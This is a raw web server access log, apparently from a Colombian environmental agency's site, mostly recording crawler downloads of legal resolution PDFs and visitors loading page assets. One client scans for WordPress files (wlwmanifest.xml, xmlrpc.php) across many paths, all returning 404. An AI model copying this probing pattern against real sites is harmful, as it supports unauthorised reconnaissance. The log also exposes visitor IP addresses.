66.249.64.145 - - [09/Aug/2019:01:16:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0592.pdf HTTP/1.1" 200 497991
66.249.64.145 - - [09/Aug/2019:01:16:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2724.pdf HTTP/1.1" 200 626044
66.249.64.147 - - [09/Aug/2019:01:17:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2924.pdf HTTP/1.1" 200 428396
66.249.64.30 - - [09/Aug/2019:01:17:49 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%203%20del%2023%20de%20Marzo%20de%202012.pdf HTTP/1.1" 200 572950
66.249.64.145 - - [09/Aug/2019:01:17:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4288.pdf HTTP/1.1" 200 806363
66.249.89.83 - - [09/Aug/2019:01:18:27 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.249.89.83 - - [09/Aug/2019:01:18:28 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.89.81 - - [09/Aug/2019:01:18:30 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.89.83 - - [09/Aug/2019:01:18:30 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
201.245.192.253 - - [09/Aug/2019:01:17:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29697
66.249.89.81 - - [09/Aug/2019:01:18:31 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
66.249.89.83 - - [09/Aug/2019:01:18:31 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
201.245.192.253 - - [09/Aug/2019:01:18:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29859
66.249.64.145 - - [09/Aug/2019:01:18:38 -0500] "GET /BLA/resoluciones/AUTOS%202016/1352.pdf HTTP/1.1" 200 310487
66.249.89.81 - - [09/Aug/2019:01:18:39 -0500] "GET /galeria/nivo-slider/demo/demo.html HTTP/1.1" 200 4781
66.249.89.81 - - [09/Aug/2019:01:18:39 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
66.249.89.81 - - [09/Aug/2019:01:18:40 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
66.249.89.81 - - [09/Aug/2019:01:18:41 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
66.249.89.81 - - [09/Aug/2019:01:18:41 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
66.249.89.81 - - [09/Aug/2019:01:18:42 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
66.249.89.81 - - [09/Aug/2019:01:18:43 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
66.249.89.81 - - [09/Aug/2019:01:18:44 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
66.249.64.145 - - [09/Aug/2019:01:19:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6375.pdf HTTP/1.1" 200 524345
201.245.192.253 - - [09/Aug/2019:01:18:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29697
185.125.219.13 - - [09/Aug/2019:01:19:29 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.104 - - [09/Aug/2019:01:19:52 -0500] "GET / HTTP/1.0" 200 9990
192.168.175.104 - - [09/Aug/2019:01:20:04 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.145 - - [09/Aug/2019:01:20:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/4587.pdf HTTP/1.1" 200 356336
69.162.124.233 - - [09/Aug/2019:01:21:00 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.29 - - [09/Aug/2019:01:21:12 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%203%20del%2005%20de%20abril%20de%202013.pdf HTTP/1.1" 200 93580
181.54.182.165 - - [09/Aug/2019:01:22:17 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.54.182.165 - - [09/Aug/2019:01:22:17 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
181.54.182.165 - - [09/Aug/2019:01:22:19 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.54.182.165 - - [09/Aug/2019:01:22:19 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
181.54.182.165 - - [09/Aug/2019:01:22:20 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
181.54.182.165 - - [09/Aug/2019:01:22:20 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
181.54.182.165 - - [09/Aug/2019:01:22:20 -0500] "GET /galeria/nivo-slider/demo/demo.html HTTP/1.1" 200 4781
181.54.182.165 - - [09/Aug/2019:01:22:21 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
181.54.182.165 - - [09/Aug/2019:01:22:21 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
181.54.182.165 - - [09/Aug/2019:01:22:22 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
181.54.182.165 - - [09/Aug/2019:01:22:22 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
181.54.182.165 - - [09/Aug/2019:01:22:23 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
181.54.182.165 - - [09/Aug/2019:01:22:23 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
181.54.182.165 - - [09/Aug/2019:01:22:23 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
181.54.182.165 - - [09/Aug/2019:01:22:23 -0500] "GET /galeria/nivo-slider/demo/images/banner%20lluvias.jpg HTTP/1.1" 200 254815
181.54.182.165 - - [09/Aug/2019:01:22:23 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20impacto.jpg HTTP/1.1" 200 72695
181.54.182.165 - - [09/Aug/2019:01:22:24 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
181.54.182.165 - - [09/Aug/2019:01:22:25 -0500] "GET /galeria/nivo-slider/demo/images/banner%20acercar.jpg HTTP/1.1" 200 182327
181.54.182.165 - - [09/Aug/2019:01:22:25 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
181.54.182.165 - - [09/Aug/2019:01:22:25 -0500] "GET /galeria/nivo-slider/demo/images/puntos%20atencion%20BANNER.jpg HTTP/1.1" 200 244208
181.54.182.165 - - [09/Aug/2019:01:22:25 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20caminatas%20agosto.png HTTP/1.1" 200 522896
181.54.182.165 - - [09/Aug/2019:01:22:27 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20Visor%20Geografico%20Ambiental.jpg HTTP/1.1" 200 204673
181.54.182.165 - - [09/Aug/2019:01:22:27 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20consumo%20sostenible%20final.jpg HTTP/1.1" 200 364746
181.54.182.165 - - [09/Aug/2019:01:22:27 -0500] "GET /galeria/nivo-slider/demo/images/bannersectorambiente.png HTTP/1.1" 200 308540
181.54.182.165 - - [09/Aug/2019:01:22:29 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20RCD.jpg HTTP/1.1" 200 92197
181.54.182.165 - - [09/Aug/2019:01:22:29 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20Conpes.jpg HTTP/1.1" 200 55220
181.54.182.165 - - [09/Aug/2019:01:22:29 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20POT.png HTTP/1.1" 200 418238
181.54.182.165 - - [09/Aug/2019:01:22:29 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20practicas%20sostenibles.jpg HTTP/1.1" 200 142958
181.54.182.165 - - [09/Aug/2019:01:22:30 -0500] "GET /galeria/nivo-slider/demo/images/incendios-forestales.png HTTP/1.1" 200 61469
181.54.182.165 - - [09/Aug/2019:01:22:30 -0500] "GET /galeria/nivo-slider/demo/images/BANNER%20punto.jpg HTTP/1.1" 200 75932
181.54.182.165 - - [09/Aug/2019:01:22:30 -0500] "GET /galeria/nivo-slider/demo/images/Banneranonimos.png HTTP/1.1" 200 109388
181.54.182.165 - - [09/Aug/2019:01:22:30 -0500] "GET /galeria/nivo-slider/demo/images/banner-humedales-de-bogota.jpg HTTP/1.1" 200 292611
181.54.182.165 - - [09/Aug/2019:01:22:31 -0500] "GET /galeria/nivo-slider/demo/images/banner-bolsas-plasticas.jpg HTTP/1.1" 200 317939
66.249.64.147 - - [09/Aug/2019:01:22:32 -0500] "GET /BLA/resoluciones/AUTOS%202013/0193.pdf HTTP/1.1" 200 1211666
181.54.182.165 - - [09/Aug/2019:01:22:38 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
181.54.182.165 - - [09/Aug/2019:01:22:38 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
66.249.64.147 - - [09/Aug/2019:01:22:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5073.pdf HTTP/1.1" 200 283989
66.249.64.27 - - [09/Aug/2019:01:22:48 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%201%20del%2023%20de%20Febrero%20de%202011.pdf HTTP/1.1" 200 540140
191.95.48.137 - - [09/Aug/2019:01:23:33 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.95.48.137 - - [09/Aug/2019:01:23:33 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.95.48.137 - - [09/Aug/2019:01:23:33 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
191.95.48.137 - - [09/Aug/2019:01:23:33 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
191.95.48.137 - - [09/Aug/2019:01:23:33 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
191.95.48.137 - - [09/Aug/2019:01:23:33 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
191.95.48.137 - - [09/Aug/2019:01:23:34 -0500] "GET /galeria/nivo-slider/demo/demo.html HTTP/1.1" 200 4781
191.95.48.137 - - [09/Aug/2019:01:23:34 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
191.95.48.137 - - [09/Aug/2019:01:23:34 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
191.95.48.137 - - [09/Aug/2019:01:23:34 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
191.95.48.137 - - [09/Aug/2019:01:23:34 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
191.95.48.137 - - [09/Aug/2019:01:23:34 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
191.95.48.137 - - [09/Aug/2019:01:23:34 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
66.249.64.145 - - [09/Aug/2019:01:23:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5842.pdf HTTP/1.1" 200 485713
66.249.64.145 - - [09/Aug/2019:01:23:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2797.pdf HTTP/1.1" 200 454182
152.61.192.232 - - [09/Aug/2019:01:24:03 -0500] "GET / HTTP/1.1" 200 9990
152.61.192.232 - - [09/Aug/2019:01:24:04 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [09/Aug/2019:01:24:25 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [09/Aug/2019:01:24:26 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
192.168.175.104 - - [09/Aug/2019:01:24:50 -0500] "GET / HTTP/1.0" 200 9990
186.3.196.89 - - [09/Aug/2019:01:24:53 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.3.196.89 - - [09/Aug/2019:01:24:53 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.3.196.89 - - [09/Aug/2019:01:24:53 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
192.168.175.104 - - [09/Aug/2019:01:25:02 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.149 - - [09/Aug/2019:01:25:06 -0500] "GET /BLA/resoluciones/AUTOS%202012/1620.pdf HTTP/1.1" 200 399671
190.217.68.66 - - [09/Aug/2019:01:25:29 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
190.217.68.66 - - [09/Aug/2019:01:25:29 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.217.68.66 - - [09/Aug/2019:01:25:29 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
190.217.68.66 - - [09/Aug/2019:01:25:29 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
190.217.68.66 - - [09/Aug/2019:01:25:29 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
190.217.68.66 - - [09/Aug/2019:01:25:29 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
190.217.68.66 - - [09/Aug/2019:01:25:29 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
190.217.68.66 - - [09/Aug/2019:01:25:29 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
190.217.68.66 - - [09/Aug/2019:01:25:29 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
190.217.68.66 - - [09/Aug/2019:01:25:29 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
190.217.68.66 - - [09/Aug/2019:01:25:30 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
190.217.68.66 - - [09/Aug/2019:01:25:30 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
190.217.68.66 - - [09/Aug/2019:01:25:30 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
190.217.68.66 - - [09/Aug/2019:01:25:30 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
190.217.68.66 - - [09/Aug/2019:01:25:30 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
190.217.68.66 - - [09/Aug/2019:01:25:30 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
190.217.68.66 - - [09/Aug/2019:01:25:30 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
190.217.68.66 - - [09/Aug/2019:01:25:30 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
190.217.68.66 - - [09/Aug/2019:01:25:30 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
190.217.68.66 - - [09/Aug/2019:01:25:33 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 8778
190.217.68.66 - - [09/Aug/2019:01:25:33 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
190.217.68.66 - - [09/Aug/2019:01:25:33 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
190.217.68.66 - - [09/Aug/2019:01:25:33 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
190.217.68.66 - - [09/Aug/2019:01:25:33 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
190.217.68.66 - - [09/Aug/2019:01:25:33 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
190.217.68.66 - - [09/Aug/2019:01:25:33 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
190.217.68.66 - - [09/Aug/2019:01:25:33 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
190.217.68.66 - - [09/Aug/2019:01:25:33 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
190.217.68.66 - - [09/Aug/2019:01:25:33 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
190.217.68.66 - - [09/Aug/2019:01:25:33 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
190.217.68.66 - - [09/Aug/2019:01:25:33 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
190.217.68.66 - - [09/Aug/2019:01:25:33 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
190.217.68.66 - - [09/Aug/2019:01:25:33 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
190.217.68.66 - - [09/Aug/2019:01:25:33 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
190.217.68.66 - - [09/Aug/2019:01:25:33 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
190.217.68.66 - - [09/Aug/2019:01:25:33 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
190.217.68.66 - - [09/Aug/2019:01:25:33 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
190.217.68.66 - - [09/Aug/2019:01:25:33 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
190.217.68.66 - - [09/Aug/2019:01:25:29 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 12235
134.249.141.83 - - [09/Aug/2019:01:25:41 -0500] "GET / HTTP/1.1" 200 9990
190.217.68.66 - - [09/Aug/2019:01:25:51 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=VERTIMIENTOS&fecha=2019&resuelve=sancionatorio HTTP/1.1" 200 1376
190.217.68.66 - - [09/Aug/2019:01:25:51 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
134.249.141.83 - - [09/Aug/2019:01:25:41 -0500] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 1015
69.162.124.233 - - [09/Aug/2019:01:26:00 -0500] "HEAD / HTTP/1.1" 200 -
134.249.141.83 - - [09/Aug/2019:01:25:57 -0500] "GET /xmlrpc.php?rsd HTTP/1.1" 404 1015
190.217.68.66 - - [09/Aug/2019:01:26:16 -0500] "GET /BLA/resoluciones/AUTOS%202019/0649.pdf HTTP/1.1" 200 4311892
134.249.141.83 - - [09/Aug/2019:01:26:13 -0500] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1015
66.249.64.149 - - [09/Aug/2019:01:26:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1885.pdf HTTP/1.1" 200 404592
134.249.141.83 - - [09/Aug/2019:01:26:29 -0500] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1015
66.249.64.28 - - [09/Aug/2019:01:26:48 -0500] "GET /POT-2013/Cartografia/15_Sistema%20de%20Movilidad%20_Secciones%20Viales_Circuitos_movilida.pdf HTTP/1.1" 200 4830571
134.249.141.83 - - [09/Aug/2019:01:26:45 -0500] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1015
134.249.141.83 - - [09/Aug/2019:01:27:01 -0500] "GET /2015/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1015
134.249.141.83 - - [09/Aug/2019:01:27:17 -0500] "GET /2017/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1015
134.249.141.83 - - [09/Aug/2019:01:27:33 -0500] "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1015
134.249.141.83 - - [09/Aug/2019:01:27:49 -0500] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1015
66.249.64.147 - - [09/Aug/2019:01:28:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3603.pdf HTTP/1.1" 200 233445
134.249.141.83 - - [09/Aug/2019:01:28:05 -0500] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1015
201.245.192.253 - - [09/Aug/2019:01:28:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29859
134.249.141.83 - - [09/Aug/2019:01:28:21 -0500] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1015
134.249.141.83 - - [09/Aug/2019:01:28:37 -0500] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1015
66.249.64.145 - - [09/Aug/2019:01:29:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2801.pdf HTTP/1.1" 200 432271
66.249.64.147 - - [09/Aug/2019:01:29:35 -0500] "GET /BLA/resoluciones/AUTOS%202012/3351.pdf HTTP/1.1" 200 1847851
207.46.13.169 - - [09/Aug/2019:01:29:43 -0500] "GET /galeria/galeria/fotos/Huemdal-el-Tunjo3G.jpg HTTP/1.1" 200 320385
192.168.175.104 - - [09/Aug/2019:01:29:48 -0500] "GET / HTTP/1.0" 200 9990
186.154.37.133 - - [09/Aug/2019:01:29:54 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.154.37.133 - - [09/Aug/2019:01:29:54 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.154.37.133 - - [09/Aug/2019:01:29:54 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
192.168.175.104 - - [09/Aug/2019:01:30:00 -0500] "GET / HTTP/1.1" 200 9990
167.0.144.38 - - [09/Aug/2019:01:30:20 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
167.0.144.38 - - [09/Aug/2019:01:30:20 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
167.0.144.38 - - [09/Aug/2019:01:30:20 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.64.145 - - [09/Aug/2019:01:30:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0454.pdf HTTP/1.1" 200 194612
69.162.124.233 - - [09/Aug/2019:01:31:00 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.145 - - [09/Aug/2019:01:31:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1981.pdf HTTP/1.1" 200 387528
66.249.64.145 - - [09/Aug/2019:01:32:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%203001%20AL%203100/RESOLUCION%203037%20DE%202007.pdf HTTP/1.1" 200 192558
65.55.210.15 - - [09/Aug/2019:01:33:02 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.64.145 - - [09/Aug/2019:01:33:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/2044.pdf HTTP/1.1" 200 757107
66.249.64.145 - - [09/Aug/2019:01:34:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5461.pdf HTTP/1.1" 200 226236
40.77.167.61 - - [09/Aug/2019:01:34:13 -0500] "GET /SIG/ECS/126PM04-PR17.pdf HTTP/1.1" 200 3810525
192.168.175.104 - - [09/Aug/2019:01:34:46 -0500] "GET / HTTP/1.0" 200 9990
111.175.32.184 - - [09/Aug/2019:01:34:47 -0500] "GET /portalsiaccapacitaciones/Listas%2520de%2520Asistencia%25202016/LISTA%2520DE%2520ASISTENCIA%2520MESA%2520PIGA%252024%2520NOVIEMBRE.pdf HTTP/1.1" 404 1019
40.77.167.61 - - [09/Aug/2019:01:34:49 -0500] "GET /portalsiaccapacitaciones/Listas%20de%20Asistencia%202015/L.A-MT11-23Jun2015.pdf HTTP/1.1" 200 796363
192.168.175.104 - - [09/Aug/2019:01:34:58 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.145 - - [09/Aug/2019:01:35:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2386.pdf HTTP/1.1" 200 422142
201.233.29.168 - - [09/Aug/2019:01:35:14 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.233.29.168 - - [09/Aug/2019:01:35:14 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
201.233.29.168 - - [09/Aug/2019:01:35:14 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.131.194.130 - - [09/Aug/2019:01:35:35 -0500] "GET /galeria/nivo-slider/demo/images/banner-ACA-01.jpg HTTP/1.1" 304 -
66.249.64.30 - - [09/Aug/2019:01:35:57 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%207%20del%2008%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 972955
69.162.124.233 - - [09/Aug/2019:01:36:00 -0500] "HEAD / HTTP/1.1" 200 -
190.217.68.66 - - [09/Aug/2019:01:36:08 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=VERTIMIENTOS&fecha=2018&resuelve=sancionatorio HTTP/1.1" 200 6272
190.217.68.66 - - [09/Aug/2019:01:36:08 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
190.217.68.66 - - [09/Aug/2019:01:36:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/4089.pdf HTTP/1.1" 200 37041799
66.249.64.145 - - [09/Aug/2019:01:36:24 -0500] "GET /BLA/resoluciones/AUTOS%202013/1854.pdf HTTP/1.1" 200 378340
152.61.128.50 - - [09/Aug/2019:01:37:00 -0500] "GET / HTTP/1.1" 200 9990
152.61.128.50 - - [09/Aug/2019:01:37:00 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [09/Aug/2019:01:37:21 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [09/Aug/2019:01:37:22 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
66.249.64.145 - - [09/Aug/2019:01:38:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/4414.pdf HTTP/1.1" 200 606020
66.249.64.145 - - [09/Aug/2019:01:38:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8607.pdf HTTP/1.1" 200 107126
201.245.192.253 - - [09/Aug/2019:01:38:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29859
40.77.167.139 - - [09/Aug/2019:01:38:42 -0500] "GET /SIG/Gesti%C3%B3n%20Ambiental/126PM03-PR28.pdf HTTP/1.1" 304 -
66.249.64.145 - - [09/Aug/2019:01:38:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2955.pdf HTTP/1.1" 200 1176621
66.249.64.149 - - [09/Aug/2019:01:39:34 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/PARTE%20B/Dise%C3%83%C2%B1o%20de%20Elementos%20M30.pdf HTTP/1.1" 404 1018
66.249.64.145 - - [09/Aug/2019:01:39:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2920.pdf HTTP/1.1" 200 209202
192.168.175.104 - - [09/Aug/2019:01:39:45 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.147 - - [09/Aug/2019:01:39:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1377.pdf HTTP/1.1" 200 342998
192.168.175.104 - - [09/Aug/2019:01:39:56 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.145 - - [09/Aug/2019:01:40:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0190.pdf HTTP/1.1" 200 273583
66.249.64.145 - - [09/Aug/2019:01:40:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1817.pdf HTTP/1.1" 200 443832
